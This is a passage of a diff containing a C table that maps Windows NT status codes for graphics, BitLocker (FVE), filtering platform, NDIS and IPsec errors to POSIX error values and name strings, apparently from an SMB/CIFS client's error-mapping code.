+-	{STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT"},
+-	{STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED, -EIO,
+-	"STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED"},
+-	{STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION, -EIO,
+-	"STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION"},
+-	{STATUS_GRAPHICS_INVALID_CLIENT_TYPE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_CLIENT_TYPE"},
+-	{STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET, -EIO,
+-	"STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET"},
+-	{STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED, -EIO,
+-	"STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED"},
+-	{STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER, -EIO,
+-	"STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER"},
+-	{STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED, -EIO,
+-	"STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED"},
+-	{STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED, -EIO,
+-	"STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED"},
+-	{STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY, -EIO,
+-	"STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY"},
+-	{STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED, -EIO,
+-	"STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED"},
+-	{STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON, -EIO,
+-	"STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON"},
+-	{STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE, -EIO,
+-	"STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE"},
+-	{STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER, -EIO,
+-	"STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER"},
+-	{STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED, -EIO,
+-	"STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED"},
+-	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS,
+-	-EIO,
+-	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS"},
+-	{STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST"},
+-	{STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR, -EIO,
+-	"STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR"},
+-	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS, -EIO,
+-	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS"},
+-	{STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST"},
+-	{STATUS_GRAPHICS_OPM_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_OPM_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_COPP_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_COPP_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_UAB_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_UAB_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS"},
+-	{STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL, -EIO,
+-	"STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL"},
+-	{STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST, -EIO,
+-	"STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST"},
+-	{STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME, -EIO,
+-	"STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME"},
+-	{STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP, -EIO,
+-	"STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP"},
+-	{STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_OPM_INVALID_POINTER, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_POINTER"},
+-	{STATUS_GRAPHICS_OPM_INTERNAL_ERROR, -EIO,
+-	"STATUS_GRAPHICS_OPM_INTERNAL_ERROR"},
+-	{STATUS_GRAPHICS_OPM_INVALID_HANDLE, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_HANDLE"},
+-	{STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE, -EIO,
+-	"STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE"},
+-	{STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH, -EIO,
+-	"STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH"},
+-	{STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED, -EIO,
+-	"STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED"},
+-	{STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED, -EIO,
+-	"STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED"},
+-	{STATUS_GRAPHICS_PVP_HFS_FAILED, -EIO,
+-	"STATUS_GRAPHICS_PVP_HFS_FAILED"},
+-	{STATUS_GRAPHICS_OPM_INVALID_SRM, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_SRM"},
+-	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP, -EIO,
+-	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP"},
+-	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP, -EIO,
+-	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP"},
+-	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA, -EIO,
+-	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA"},
+-	{STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET, -EIO,
+-	"STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET"},
+-	{STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH, -EIO,
+-	"STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH"},
+-	{STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE, -EIO,
+-	"STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE"},
+-	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS, -EIO,
+-	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS"},
+-	{STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS, -EIO,
+-	"STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS"},
+-	{STATUS_GRAPHICS_I2C_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_I2C_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST, -EIO,
+-	"STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST"},
+-	{STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA, -EIO,
+-	"STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA"},
+-	{STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA, -EIO,
+-	"STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA"},
+-	{STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_DDCCI_INVALID_DATA, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_INVALID_DATA"},
+-	{STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE,
+-	-EIO,
+-	"STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE"},
+-	{STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING"},
+-	{STATUS_GRAPHICS_MCA_INTERNAL_ERROR, -EIO,
+-	"STATUS_GRAPHICS_MCA_INTERNAL_ERROR"},
+-	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND"},
+-	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH"},
+-	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM"},
+-	{STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE"},
+-	{STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS, -EIO,
+-	"STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS"},
+-	{STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED"},
+-	{STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME, -EIO,
+-	"STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME"},
+-	{STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP, -EIO,
+-	"STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP"},
+-	{STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_INVALID_POINTER, -EIO,
+-	"STATUS_GRAPHICS_INVALID_POINTER"},
+-	{STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE, -EIO,
+-	"STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE"},
+-	{STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL, -EIO,
+-	"STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL"},
+-	{STATUS_GRAPHICS_INTERNAL_ERROR, -EIO,
+-	"STATUS_GRAPHICS_INTERNAL_ERROR"},
+-	{STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS, -EIO,
+-	"STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS"},
+-	{STATUS_FVE_LOCKED_VOLUME, -EIO, "STATUS_FVE_LOCKED_VOLUME"},
+-	{STATUS_FVE_NOT_ENCRYPTED, -EIO, "STATUS_FVE_NOT_ENCRYPTED"},
+-	{STATUS_FVE_BAD_INFORMATION, -EIO, "STATUS_FVE_BAD_INFORMATION"},
+-	{STATUS_FVE_TOO_SMALL, -EIO, "STATUS_FVE_TOO_SMALL"},
+-	{STATUS_FVE_FAILED_WRONG_FS, -EIO, "STATUS_FVE_FAILED_WRONG_FS"},
+-	{STATUS_FVE_FAILED_BAD_FS, -EIO, "STATUS_FVE_FAILED_BAD_FS"},
+-	{STATUS_FVE_FS_NOT_EXTENDED, -EIO, "STATUS_FVE_FS_NOT_EXTENDED"},
+-	{STATUS_FVE_FS_MOUNTED, -EIO, "STATUS_FVE_FS_MOUNTED"},
+-	{STATUS_FVE_NO_LICENSE, -EIO, "STATUS_FVE_NO_LICENSE"},
+-	{STATUS_FVE_ACTION_NOT_ALLOWED, -EIO, "STATUS_FVE_ACTION_NOT_ALLOWED"},
+-	{STATUS_FVE_BAD_DATA, -EIO, "STATUS_FVE_BAD_DATA"},
+-	{STATUS_FVE_VOLUME_NOT_BOUND, -EIO, "STATUS_FVE_VOLUME_NOT_BOUND"},
+-	{STATUS_FVE_NOT_DATA_VOLUME, -EIO, "STATUS_FVE_NOT_DATA_VOLUME"},
+-	{STATUS_FVE_CONV_READ_ERROR, -EIO, "STATUS_FVE_CONV_READ_ERROR"},
+-	{STATUS_FVE_CONV_WRITE_ERROR, -EIO, "STATUS_FVE_CONV_WRITE_ERROR"},
+-	{STATUS_FVE_OVERLAPPED_UPDATE, -EIO, "STATUS_FVE_OVERLAPPED_UPDATE"},
+-	{STATUS_FVE_FAILED_SECTOR_SIZE, -EIO, "STATUS_FVE_FAILED_SECTOR_SIZE"},
+-	{STATUS_FVE_FAILED_AUTHENTICATION, -EIO,
+-	"STATUS_FVE_FAILED_AUTHENTICATION"},
+-	{STATUS_FVE_NOT_OS_VOLUME, -EIO, "STATUS_FVE_NOT_OS_VOLUME"},
+-	{STATUS_FVE_KEYFILE_NOT_FOUND, -EIO, "STATUS_FVE_KEYFILE_NOT_FOUND"},
+-	{STATUS_FVE_KEYFILE_INVALID, -EIO, "STATUS_FVE_KEYFILE_INVALID"},
+-	{STATUS_FVE_KEYFILE_NO_VMK, -EIO, "STATUS_FVE_KEYFILE_NO_VMK"},
+-	{STATUS_FVE_TPM_DISABLED, -EIO, "STATUS_FVE_TPM_DISABLED"},
+-	{STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO, -EIO,
+-	"STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO"},
+-	{STATUS_FVE_TPM_INVALID_PCR, -EIO, "STATUS_FVE_TPM_INVALID_PCR"},
+-	{STATUS_FVE_TPM_NO_VMK, -EIO, "STATUS_FVE_TPM_NO_VMK"},
+-	{STATUS_FVE_PIN_INVALID, -EIO, "STATUS_FVE_PIN_INVALID"},
+-	{STATUS_FVE_AUTH_INVALID_APPLICATION, -EIO,
+-	"STATUS_FVE_AUTH_INVALID_APPLICATION"},
+-	{STATUS_FVE_AUTH_INVALID_CONFIG, -EIO,
+-	"STATUS_FVE_AUTH_INVALID_CONFIG"},
+-	{STATUS_FVE_DEBUGGER_ENABLED, -EIO, "STATUS_FVE_DEBUGGER_ENABLED"},
+-	{STATUS_FVE_DRY_RUN_FAILED, -EIO, "STATUS_FVE_DRY_RUN_FAILED"},
+-	{STATUS_FVE_BAD_METADATA_POINTER, -EIO,
+-	"STATUS_FVE_BAD_METADATA_POINTER"},
+-	{STATUS_FVE_OLD_METADATA_COPY, -EIO, "STATUS_FVE_OLD_METADATA_COPY"},
+-	{STATUS_FVE_REBOOT_REQUIRED, -EIO, "STATUS_FVE_REBOOT_REQUIRED"},
+-	{STATUS_FVE_RAW_ACCESS, -EIO, "STATUS_FVE_RAW_ACCESS"},
+-	{STATUS_FVE_RAW_BLOCKED, -EIO, "STATUS_FVE_RAW_BLOCKED"},
+-	{STATUS_FWP_CALLOUT_NOT_FOUND, -EIO, "STATUS_FWP_CALLOUT_NOT_FOUND"},
+-	{STATUS_FWP_CONDITION_NOT_FOUND, -EIO,
+-	"STATUS_FWP_CONDITION_NOT_FOUND"},
+-	{STATUS_FWP_FILTER_NOT_FOUND, -EIO, "STATUS_FWP_FILTER_NOT_FOUND"},
+-	{STATUS_FWP_LAYER_NOT_FOUND, -EIO, "STATUS_FWP_LAYER_NOT_FOUND"},
+-	{STATUS_FWP_PROVIDER_NOT_FOUND, -EIO, "STATUS_FWP_PROVIDER_NOT_FOUND"},
+-	{STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND, -EIO,
+-	"STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND"},
+-	{STATUS_FWP_SUBLAYER_NOT_FOUND, -EIO, "STATUS_FWP_SUBLAYER_NOT_FOUND"},
+-	{STATUS_FWP_NOT_FOUND, -EIO, "STATUS_FWP_NOT_FOUND"},
+-	{STATUS_FWP_ALREADY_EXISTS, -EIO, "STATUS_FWP_ALREADY_EXISTS"},
+-	{STATUS_FWP_IN_USE, -EIO, "STATUS_FWP_IN_USE"},
+-	{STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS, -EIO,
+-	"STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS"},
+-	{STATUS_FWP_WRONG_SESSION, -EIO, "STATUS_FWP_WRONG_SESSION"},
+-	{STATUS_FWP_NO_TXN_IN_PROGRESS, -EIO, "STATUS_FWP_NO_TXN_IN_PROGRESS"},
+-	{STATUS_FWP_TXN_IN_PROGRESS, -EIO, "STATUS_FWP_TXN_IN_PROGRESS"},
+-	{STATUS_FWP_TXN_ABORTED, -EIO, "STATUS_FWP_TXN_ABORTED"},
+-	{STATUS_FWP_SESSION_ABORTED, -EIO, "STATUS_FWP_SESSION_ABORTED"},
+-	{STATUS_FWP_INCOMPATIBLE_TXN, -EIO, "STATUS_FWP_INCOMPATIBLE_TXN"},
+-	{STATUS_FWP_TIMEOUT, -ETIMEDOUT, "STATUS_FWP_TIMEOUT"},
+-	{STATUS_FWP_NET_EVENTS_DISABLED, -EIO,
+-	"STATUS_FWP_NET_EVENTS_DISABLED"},
+-	{STATUS_FWP_INCOMPATIBLE_LAYER, -EIO, "STATUS_FWP_INCOMPATIBLE_LAYER"},
+-	{STATUS_FWP_KM_CLIENTS_ONLY, -EIO, "STATUS_FWP_KM_CLIENTS_ONLY"},
+-	{STATUS_FWP_LIFETIME_MISMATCH, -EIO, "STATUS_FWP_LIFETIME_MISMATCH"},
+-	{STATUS_FWP_BUILTIN_OBJECT, -EIO, "STATUS_FWP_BUILTIN_OBJECT"},
+-	{STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS, -EIO,
+-	"STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS"},
+-	{STATUS_FWP_TOO_MANY_CALLOUTS, -EIO, "STATUS_FWP_TOO_MANY_CALLOUTS"},
+-	{STATUS_FWP_NOTIFICATION_DROPPED, -EIO,
+-	"STATUS_FWP_NOTIFICATION_DROPPED"},
+-	{STATUS_FWP_TRAFFIC_MISMATCH, -EIO, "STATUS_FWP_TRAFFIC_MISMATCH"},
+-	{STATUS_FWP_INCOMPATIBLE_SA_STATE, -EIO,
+-	"STATUS_FWP_INCOMPATIBLE_SA_STATE"},
+-	{STATUS_FWP_NULL_POINTER, -EIO, "STATUS_FWP_NULL_POINTER"},
+-	{STATUS_FWP_INVALID_ENUMERATOR, -EIO, "STATUS_FWP_INVALID_ENUMERATOR"},
+-	{STATUS_FWP_INVALID_FLAGS, -EIO, "STATUS_FWP_INVALID_FLAGS"},
+-	{STATUS_FWP_INVALID_NET_MASK, -EIO, "STATUS_FWP_INVALID_NET_MASK"},
+-	{STATUS_FWP_INVALID_RANGE, -EIO, "STATUS_FWP_INVALID_RANGE"},
+-	{STATUS_FWP_INVALID_INTERVAL, -EIO, "STATUS_FWP_INVALID_INTERVAL"},
+-	{STATUS_FWP_ZERO_LENGTH_ARRAY, -EIO, "STATUS_FWP_ZERO_LENGTH_ARRAY"},
+-	{STATUS_FWP_NULL_DISPLAY_NAME, -EIO, "STATUS_FWP_NULL_DISPLAY_NAME"},
+-	{STATUS_FWP_INVALID_ACTION_TYPE, -EIO,
+-	"STATUS_FWP_INVALID_ACTION_TYPE"},
+-	{STATUS_FWP_INVALID_WEIGHT, -EIO, "STATUS_FWP_INVALID_WEIGHT"},
+-	{STATUS_FWP_MATCH_TYPE_MISMATCH, -EIO,
+-	"STATUS_FWP_MATCH_TYPE_MISMATCH"},
+-	{STATUS_FWP_TYPE_MISMATCH, -EIO, "STATUS_FWP_TYPE_MISMATCH"},
+-	{STATUS_FWP_OUT_OF_BOUNDS, -EIO, "STATUS_FWP_OUT_OF_BOUNDS"},
+-	{STATUS_FWP_RESERVED, -EIO, "STATUS_FWP_RESERVED"},
+-	{STATUS_FWP_DUPLICATE_CONDITION, -EIO,
+-	"STATUS_FWP_DUPLICATE_CONDITION"},
+-	{STATUS_FWP_DUPLICATE_KEYMOD, -EIO, "STATUS_FWP_DUPLICATE_KEYMOD"},
+-	{STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER, -EIO,
+-	"STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER"},
+-	{STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER, -EIO,
+-	"STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER"},
+-	{STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER, -EIO,
+-	"STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER"},
+-	{STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT, -EIO,
+-	"STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT"},
+-	{STATUS_FWP_INCOMPATIBLE_AUTH_METHOD, -EIO,
+-	"STATUS_FWP_INCOMPATIBLE_AUTH_METHOD"},
+-	{STATUS_FWP_INCOMPATIBLE_DH_GROUP, -EIO,
+-	"STATUS_FWP_INCOMPATIBLE_DH_GROUP"},
+-	{STATUS_FWP_EM_NOT_SUPPORTED, -EOPNOTSUPP,
+-	"STATUS_FWP_EM_NOT_SUPPORTED"},
+-	{STATUS_FWP_NEVER_MATCH, -EIO, "STATUS_FWP_NEVER_MATCH"},
+-	{STATUS_FWP_PROVIDER_CONTEXT_MISMATCH, -EIO,
+-	"STATUS_FWP_PROVIDER_CONTEXT_MISMATCH"},
+-	{STATUS_FWP_INVALID_PARAMETER, -EIO, "STATUS_FWP_INVALID_PARAMETER"},
+-	{STATUS_FWP_TOO_MANY_SUBLAYERS, -EIO, "STATUS_FWP_TOO_MANY_SUBLAYERS"},
+-	{STATUS_FWP_CALLOUT_NOTIFICATION_FAILED, -EIO,
+-	"STATUS_FWP_CALLOUT_NOTIFICATION_FAILED"},
+-	{STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG, -EIO,
+-	"STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG"},
+-	{STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG, -EIO,
+-	"STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG"},
+-	{STATUS_FWP_TCPIP_NOT_READY, -EIO, "STATUS_FWP_TCPIP_NOT_READY"},
+-	{STATUS_FWP_INJECT_HANDLE_CLOSING, -EIO,
+-	"STATUS_FWP_INJECT_HANDLE_CLOSING"},
+-	{STATUS_FWP_INJECT_HANDLE_STALE, -EIO,
+-	"STATUS_FWP_INJECT_HANDLE_STALE"},
+-	{STATUS_FWP_CANNOT_PEND, -EIO, "STATUS_FWP_CANNOT_PEND"},
+-	{STATUS_NDIS_CLOSING, -EIO, "STATUS_NDIS_CLOSING"},
+-	{STATUS_NDIS_BAD_VERSION, -EIO, "STATUS_NDIS_BAD_VERSION"},
+-	{STATUS_NDIS_BAD_CHARACTERISTICS, -EIO,
+-	"STATUS_NDIS_BAD_CHARACTERISTICS"},
+-	{STATUS_NDIS_ADAPTER_NOT_FOUND, -EIO, "STATUS_NDIS_ADAPTER_NOT_FOUND"},
+-	{STATUS_NDIS_OPEN_FAILED, -EIO, "STATUS_NDIS_OPEN_FAILED"},
+-	{STATUS_NDIS_DEVICE_FAILED, -EIO, "STATUS_NDIS_DEVICE_FAILED"},
+-	{STATUS_NDIS_MULTICAST_FULL, -EIO, "STATUS_NDIS_MULTICAST_FULL"},
+-	{STATUS_NDIS_MULTICAST_EXISTS, -EIO, "STATUS_NDIS_MULTICAST_EXISTS"},
+-	{STATUS_NDIS_MULTICAST_NOT_FOUND, -EIO,
+-	"STATUS_NDIS_MULTICAST_NOT_FOUND"},
+-	{STATUS_NDIS_REQUEST_ABORTED, -EIO, "STATUS_NDIS_REQUEST_ABORTED"},
+-	{STATUS_NDIS_RESET_IN_PROGRESS, -EIO, "STATUS_NDIS_RESET_IN_PROGRESS"},
+-	{STATUS_NDIS_INVALID_PACKET, -EIO, "STATUS_NDIS_INVALID_PACKET"},
+-	{STATUS_NDIS_INVALID_DEVICE_REQUEST, -EIO,
+-	"STATUS_NDIS_INVALID_DEVICE_REQUEST"},
+-	{STATUS_NDIS_ADAPTER_NOT_READY, -EIO, "STATUS_NDIS_ADAPTER_NOT_READY"},
+-	{STATUS_NDIS_INVALID_LENGTH, -EIO, "STATUS_NDIS_INVALID_LENGTH"},
+-	{STATUS_NDIS_INVALID_DATA, -EIO, "STATUS_NDIS_INVALID_DATA"},
+-	{STATUS_NDIS_BUFFER_TOO_SHORT, -ENOBUFS,
+-	"STATUS_NDIS_BUFFER_TOO_SHORT"},
+-	{STATUS_NDIS_INVALID_OID, -EIO, "STATUS_NDIS_INVALID_OID"},
+-	{STATUS_NDIS_ADAPTER_REMOVED, -EIO, "STATUS_NDIS_ADAPTER_REMOVED"},
+-	{STATUS_NDIS_UNSUPPORTED_MEDIA, -EIO, "STATUS_NDIS_UNSUPPORTED_MEDIA"},
+-	{STATUS_NDIS_GROUP_ADDRESS_IN_USE, -EIO,
+-	"STATUS_NDIS_GROUP_ADDRESS_IN_USE"},
+-	{STATUS_NDIS_FILE_NOT_FOUND, -EIO, "STATUS_NDIS_FILE_NOT_FOUND"},
+-	{STATUS_NDIS_ERROR_READING_FILE, -EIO,
+-	"STATUS_NDIS_ERROR_READING_FILE"},
+-	{STATUS_NDIS_ALREADY_MAPPED, -EIO, "STATUS_NDIS_ALREADY_MAPPED"},
+-	{STATUS_NDIS_RESOURCE_CONFLICT, -EIO, "STATUS_NDIS_RESOURCE_CONFLICT"},
+-	{STATUS_NDIS_MEDIA_DISCONNECTED, -EIO,
+-	"STATUS_NDIS_MEDIA_DISCONNECTED"},
+-	{STATUS_NDIS_INVALID_ADDRESS, -EIO, "STATUS_NDIS_INVALID_ADDRESS"},
+-	{STATUS_NDIS_PAUSED, -EIO, "STATUS_NDIS_PAUSED"},
+-	{STATUS_NDIS_INTERFACE_NOT_FOUND, -EIO,
+-	"STATUS_NDIS_INTERFACE_NOT_FOUND"},
+-	{STATUS_NDIS_UNSUPPORTED_REVISION, -EIO,
+-	"STATUS_NDIS_UNSUPPORTED_REVISION"},
+-	{STATUS_NDIS_INVALID_PORT, -EIO, "STATUS_NDIS_INVALID_PORT"},
+-	{STATUS_NDIS_INVALID_PORT_STATE, -EIO,
+-	"STATUS_NDIS_INVALID_PORT_STATE"},
+-	{STATUS_NDIS_LOW_POWER_STATE, -EIO, "STATUS_NDIS_LOW_POWER_STATE"},
+-	{STATUS_NDIS_NOT_SUPPORTED, -ENOSYS, "STATUS_NDIS_NOT_SUPPORTED"},
+-	{STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED, -EIO,
+-	"STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED"},
+-	{STATUS_NDIS_DOT11_MEDIA_IN_USE, -EIO,
+-	"STATUS_NDIS_DOT11_MEDIA_IN_USE"},
+-	{STATUS_NDIS_DOT11_POWER_STATE_INVALID, -EIO,
+-	"STATUS_NDIS_DOT11_POWER_STATE_INVALID"},
+-	{STATUS_IPSEC_BAD_SPI, -EIO, "STATUS_IPSEC_BAD_SPI"},
+-	{STATUS_IPSEC_SA_LIFETIME_EXPIRED, -EIO,
+-	"STATUS_IPSEC_SA_LIFETIME_EXPIRED"},
+-	{STATUS_IPSEC_WRONG_SA, -EIO, "STATUS_IPSEC_WRONG_SA"},
+-	{STATUS_IPSEC_REPLAY_CHECK_FAILED, -EIO,
+-	"STATUS_IPSEC_REPLAY_CHECK_FAILED"},
+-	{STATUS_IPSEC_INVALID_PACKET, -EIO, "STATUS_IPSEC_INVALID_PACKET"},
+-	{STATUS_IPSEC_INTEGRITY_CHECK_FAILED, -EIO,
+-	"STATUS_IPSEC_INTEGRITY_CHECK_FAILED"},
